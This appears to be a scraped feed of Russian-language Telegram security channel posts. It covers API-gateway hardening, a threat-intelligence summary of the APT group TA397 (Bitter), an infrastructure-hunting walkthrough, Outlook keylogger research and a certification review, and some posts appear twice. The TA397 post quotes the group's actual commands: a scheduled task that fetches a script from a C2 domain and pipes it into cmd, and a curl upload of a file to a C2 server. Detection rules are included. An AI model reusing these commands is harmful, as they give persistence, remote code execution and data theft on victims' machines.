Forwarded from Blue (h/c)at Café
Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.
В Web3 большинство угроз входит не через «модные» DeFi-примитивы, а через вполне классический API-интерфейс. Просто формат другой: не form-data, а подписанный JSON с маршрутом, суммой и временной меткой. CatSwap, как агрегатор, — типичный пример. Все транзакции, котировки, swap-запросы проходят через публичное API.
▫️ HTTPS (TLS 1.2+) + WAF
• Принудительное HTTPS;
• WAF / WAF с OWASP CRS, бот-контролем и Geo-ACL.
▫️ Аутентификация
• JWT в
envoy.filters.http.jwt_authn;• Web3-подписи (EIP-191/712) через Proxy-Wasm (X-Address + X-Signature);
• Challenge-nonce, защита от replay-атак.
▫️ Авторизация (OPA / ExtAuthz)
• RBAC/ABAC-политики по ролям, slippageTolerance, gasPrice, геопозиция, времени суток;
• Динамические политики Rego + GitOps-репозиторий.
▫️ JSON-валидация запросов
• OpenAPI-схемы → Envoy JSON Validator, ошибка 400 при несоответствии;
• Чёткое разделение обязательных и опциональных полей.
▫️ Rate Limit & QoS
•
/v1/quote ≤ 1000 r/m; /v1/swap ≤ 100 r/m;• Circuit breaker, retry, max concurrent;
• Приоритет маршрутов, Kubernetes Resource Limits.
▫️ API Gateway (Envoy + Proxy-Wasm)
• JWT (RS256) через envoy.filters.http.jwt_authn;
• JSON Schema Validator — строгая валидация payload;
• Rate-limit, circuit breaker, retry с экспоненциальным backoff;
• ExtAuthz → ML-анализ;
• mTLS внутри кластера (Istio-SDS или Envoy native).
▫️ Логирование & мониторинг
• JSON Access Logs (
path, key, user_id, latency, tx_hash);• Prometheus (p95/p99, ошибки, RPS) / Grafana—дашборды;
• OpenTelemetry + Jaeger; трассировка end-to-end;
• GitOps-аудит конфигов (ArgoCD/Flux).
▫️ Management plane hardening
• Bastion-host с MFA для доступа к административным интерфейсам;
• Жёсткие IAM-роли и Just-In-Time elevation для операторов.
▫️ CI/CD & GitOps
• Инфраструктура как код (Terraform, Helm);
• ArgoCD синхронизация; PR-ревью, tfsec/checkov, canary-релизы.
▫️ Supply chain security & SBOM
• Генерация и хранение SBOM для всех контейнеров и зависимостей;
• Подпись артефактов (cosign/Sigstore) и верификация на этапе деплоя.
▫️ Контроль изменений и drift detection
• Policy as Code (OPA, Terraform Sentinel);
• Инструменты проверки конфигураций (tfsec, Checkov, Conftest).
▫️ ML-анализ в Gateway
• Isolation Forest в Seldon Core; Envoy ExtAuthz вызывает /predict;
• Блокировка при
score > 0.8; алёрты в SIEM/Slack.▫️ API lifecycle & versioning
• Явное управление версиями API, deprecation-policy, backward-compatibility тесты;
• Тёмные и канареечные запуски (traffic mirroring) новых эндпоинтов.
▫️ Disaster recovery & multi-region failover
• Репликация Gateway в нескольких регионах; автоматический DNS-фейловер;
• Документированные RTO/RPO и регулярные drill-тесты.
▫️ Пентесты & Bug Bounty
• Ежеквартальные внешние пентесты API Gateway и RPC-узлов;
• Запуск программы Bug Bounty (HackerOne / Standoff / bizone) для непрерывного обнаружения уязвимостей.
▫️ План реагирования на инциденты (по просьбе SOC)
• Определённые playbook:
detection → containment → eradication → recovery;• SLA/TTR для критичных сервисов; регулярные учения.
▫️ Приватные RPC (PrivateLink / IAM)
• JSON-RPC узлы скрыты за VPC Endpoint (PrivateLink / PSC);
• Доступ по SigV4 / ACL; rate-limit и circuit breaker перед нодами.
▫️ HTTP-security headers
• HSTS (Strict-Transport-Security), CSP, X-Frame-Options, X-Content-Type-Options;
• Защита от clickjacking и MIME-sniffing.
▫️ Сегментация сети и ограничения доступа
• Kubernetes NetworkPolicies; NSG/Security Groups;
• Микросегментация: отдельные VPC/subnet для критичных сервисов.
В общем, это не просто чеклист для галочки. Это попытка собрать разумную, масштабируемую и живучую архитектуру, в которой API Gateway — не прослойка между интернетом и микросервисами, а полноценная точка принятия решений.
#appsec
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
🧵 TA397 (Bitter)
📌 Новый отчёт от Proofpoint и Threatray раскрывает, как на протяжении 8 лет предположительно индийская APT-группа TA397 ведёт разведку против дипмиссий, правительств и оборонных структур в Европе и Азии.
☕ Немного контекста
Группа давно известна под именем Bitter и подозревается в работе на индийские интересы. Но вместо сложных эксплойтов — ставка на точный фишинг и нестандартный подход к Scheduled Tasks.
Работают строго по графику — 9:00–17:00 по IST, как в офисе.
✉️ Входной вектор: дипломатия, CHM и .MSC
TA397 маскируются под посольства, министерства и оборонные ведомства. Темы писем максимально приближены к реальности:
⚙️ Цепочки заражения
🎣 Email → архив → файл → PowerShell → Scheduled Task → C2
Пример: MSC-файл запускает
🔍 Команда, достойная отдельной кружки чая
PowerShell качает скрипт, читает его и передаёт в
📌 C2-запросы всегда включают
🎯 Ручной контроль
После успешной установки задачи, TA397 ждут, и только если цель «интересна», загружают RAT (например, Demon Agent или BDarkRAT). Примеры активности:
Иногда монтируют удалённую шару
Упаковка PE-файлов вручную:
🧠 Детект
1. conhost в headless-режиме
Весь материал в пост не уместить, поэтому к прочтению:
🔗 https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one
🔗 https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two
🦔 THF
📌 Новый отчёт от Proofpoint и Threatray раскрывает, как на протяжении 8 лет предположительно индийская APT-группа TA397 ведёт разведку против дипмиссий, правительств и оборонных структур в Европе и Азии.
TA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan, and other neighboring countries on the Indian subcontinent.
☕ Немного контекста
Группа давно известна под именем Bitter и подозревается в работе на индийские интересы. Но вместо сложных эксплойтов — ставка на точный фишинг и нестандартный подход к Scheduled Tasks.
Работают строго по графику — 9:00–17:00 по IST, как в офисе.
TA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian Standard Time (IST) timezone.
✉️ Входной вектор: дипломатия, CHM и .MSC
TA397 маскируются под посольства, министерства и оборонные ведомства. Темы писем максимально приближены к реальности:
"AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS"
"SituationNote : SouthKorea_Martial law"
"Note from Embassy of Mauritius"
"Key National Defense R&D Projects"
Вложения — RAR-архивы с .CHM, .LNK, .MSC. Изредка — IQY и Access DB.⚙️ Цепочки заражения
🎣 Email → архив → файл → PowerShell → Scheduled Task → C2
Пример: MSC-файл запускает
mmc.exe, который создаёт задачу через schtasks, использует conhost.exe и PowerShell 🔍 Команда, достойная отдельной кружки чая
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm 'woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME' -OutFile 'kwe.cc'; Get-Content 'kwe.cc' | cmd"
Что тут:ping → создаёт задержкуschtasks создаёт задачуPowerShell качает скрипт, читает его и передаёт в
cmd📌 C2-запросы всегда включают
COMPUTERNAME и USERNAME — иногда через *, .., --, ; и даже __ — чтобы запутать сигнатуры.🎯 Ручной контроль
После успешной установки задачи, TA397 ждут, и только если цель «интересна», загружают RAT (например, Demon Agent или BDarkRAT). Примеры активности:
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" http://1.1.1[.]1/svupfl.php?oi=HOST_USER
Собирают systeminfo, tasklist, wmicИногда монтируют удалённую шару
\\IP\tempy, откуда грузят RAT’ы (wmRAT, MiyaRAT)Упаковка PE-файлов вручную:
sh1.txt + sh2.txt = shh.exe🧠 Детект
1. conhost в headless-режиме
event_type: "processcreatewin"
AND proc_file_name: "conhost.exe"
AND cmdline: "headless"
2. PowerShell → Get-Content → cmdevent_type: "processcreatewin"
AND proc_file_name: "powershell.exe"
AND cmdline: ("get-content" AND "cmd")
3. C2-сервер с Let’s Encrypt + PHP endpoint + имя машиныhttps://domain[.]com/sdf.php?fv=HOST*USER
Весь материал в пост не уместить, поэтому к прочтению:
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
🕵️ Как из одного IP вытянуть больше информации
Во время TH или анализа инцидента часто всё начинается с одного объекта — подозрительного IP-адреса/домена. Но за ним может стоять целый кластер C2, фишинговых доменов и прокси.
📦 Что делать дальше?
Провести инфраструктурную разведку: поиск связей, повторно используемых конфигураций и других узлов.
🛠 Часть полезных инструментов:
▪️ Whois / Passive DNS
▪️ Shodan, Censys
▪️ VirusTotal, AbuseIPDB
▪️ Hunt.io
🔍 Сегодня рассмотрим пример Hunt.io
1. Старт с IP
Адрес
2. Базовая инфа
📍 Хостинг: BL Networks (анонимные VPS)
📛 Домен:
📌 Один домен на IP → не shared-хостинг → признак выделенного C2
3. Порты и сервисы
Открыты 22 (SSH), 80, 443.
Nginx, ответ на 443 —
⚠️ Признаков Cobalt Strike или чего-то редкого — нет.
4. Сертификаты
🔐 Self-signed, CN =
🧬 Используем JA4X фингерпринт → ищем похожие конфигурации
5. SQL-поиск в Hunt
По JA4X найдено всего 6 хостов → высокая уникальность → можно связывать в одну группу.
6. Проверка в VirusTotal
Часть адресов детектится, есть упоминание Latrodectus (модульная малварь).
Изолированный IP оказался частью скрытой инфраструктуры.
✔️ Из одного IP получен кластер из нескольких C2-хостов
✔️ Методика применима для охоты на инфраструктуру до компрометации
✔️ Позволяет строить детект на основе поведения: VPS-провайдер, TLS-паттерны, конфигурации, а не конкретные адреса
🔗 https://hunt.io/blog/practical-guide-unconvering-malicious-infrastructure
🦔 THF
Во время TH или анализа инцидента часто всё начинается с одного объекта — подозрительного IP-адреса/домена. Но за ним может стоять целый кластер C2, фишинговых доменов и прокси.
📦 Что делать дальше?
Провести инфраструктурную разведку: поиск связей, повторно используемых конфигураций и других узлов.
🛠 Часть полезных инструментов:
▪️ Whois / Passive DNS
▪️ Shodan, Censys
▪️ VirusTotal, AbuseIPDB
▪️ Hunt.io
🔍 Сегодня рассмотрим пример Hunt.io
1. Старт с IP
Адрес
168.100.9[.]71 всплыл в фиде/иницденте как подозрительный.2. Базовая инфа
📍 Хостинг: BL Networks (анонимные VPS)
📛 Домен:
btc-winnings-made[.]com → намёк на криптоскам📌 Один домен на IP → не shared-хостинг → признак выделенного C2
3. Порты и сервисы
Открыты 22 (SSH), 80, 443.
Nginx, ответ на 443 —
404 с заглушкой.⚠️ Признаков Cobalt Strike или чего-то редкого — нет.
4. Сертификаты
🔐 Self-signed, CN =
localhost, Issuer = Internet Widgits Pty Ltd🧬 Используем JA4X фингерпринт → ищем похожие конфигурации
5. SQL-поиск в Hunt
По JA4X найдено всего 6 хостов → высокая уникальность → можно связывать в одну группу.
6. Проверка в VirusTotal
Часть адресов детектится, есть упоминание Latrodectus (модульная малварь).
Изолированный IP оказался частью скрытой инфраструктуры.
✔️ Из одного IP получен кластер из нескольких C2-хостов
✔️ Методика применима для охоты на инфраструктуру до компрометации
✔️ Позволяет строить детект на основе поведения: VPS-провайдер, TLS-паттерны, конфигурации, а не конкретные адреса
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ESCalator
Мутация Exchange. Как мы аномалии в Outlook-страницах ловили 😮
В продолжение историй с расследований инцидентов (о них можно почитать вот тут, здесь и частично послушать тут) мы решили проанализировать общую концепцию вставок вредоносного кода в страницы аутентификации Microsoft Outlook. В итоге:
• Помимо обнаруженного на расследованиях инцидентов кейлоггера, обнаружили множество других аналогичных вредоносов.
• Ключевое отличие всех вредоносных фрагментов кода заключается в способе отправки учетных данных жертв: в нем применяются сохранение данных в файл на сервере, DNS-туннелирование, отправка сообщений в телеграм-бота и другие техники.
• Заражения были обнаружены в 26 странах. Большинство скомпрометированных серверов находятся во Вьетнаме, Китае, России, Тайване.
• Как показывает статистика, основная причина успешных атак на серверы — отсутствие установленных обновлений безопасности; на 3 из 65 серверов обновления отсутствовали с 2013 года.
📫 Какие кейлоггеры были обнаружены, куда и как хакеры отправляют данные жертв и как обнаружить вредоносный код в странице Outlook, рассказали в нашем исследовании.
#TI #IR #Malware
@ptescalator
В продолжение историй с расследований инцидентов (о них можно почитать вот тут, здесь и частично послушать тут) мы решили проанализировать общую концепцию вставок вредоносного кода в страницы аутентификации Microsoft Outlook. В итоге:
• Помимо обнаруженного на расследованиях инцидентов кейлоггера, обнаружили множество других аналогичных вредоносов.
• Ключевое отличие всех вредоносных фрагментов кода заключается в способе отправки учетных данных жертв: в нем применяются сохранение данных в файл на сервере, DNS-туннелирование, отправка сообщений в телеграм-бота и другие техники.
• Заражения были обнаружены в 26 странах. Большинство скомпрометированных серверов находятся во Вьетнаме, Китае, России, Тайване.
• Как показывает статистика, основная причина успешных атак на серверы — отсутствие установленных обновлений безопасности; на 3 из 65 серверов обновления отсутствовали с 2013 года.
📫 Какие кейлоггеры были обнаружены, куда и как хакеры отправляют данные жертв и как обнаружить вредоносный код в странице Outlook, рассказали в нашем исследовании.
#TI #IR #Malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Whitehat Lab
Как и обещал, выкладываю обзор
Вопросы автору можно задать в чате или комментариях
Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации.
HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.
Коротко о курсе:
Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста
#htb #cert #exam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2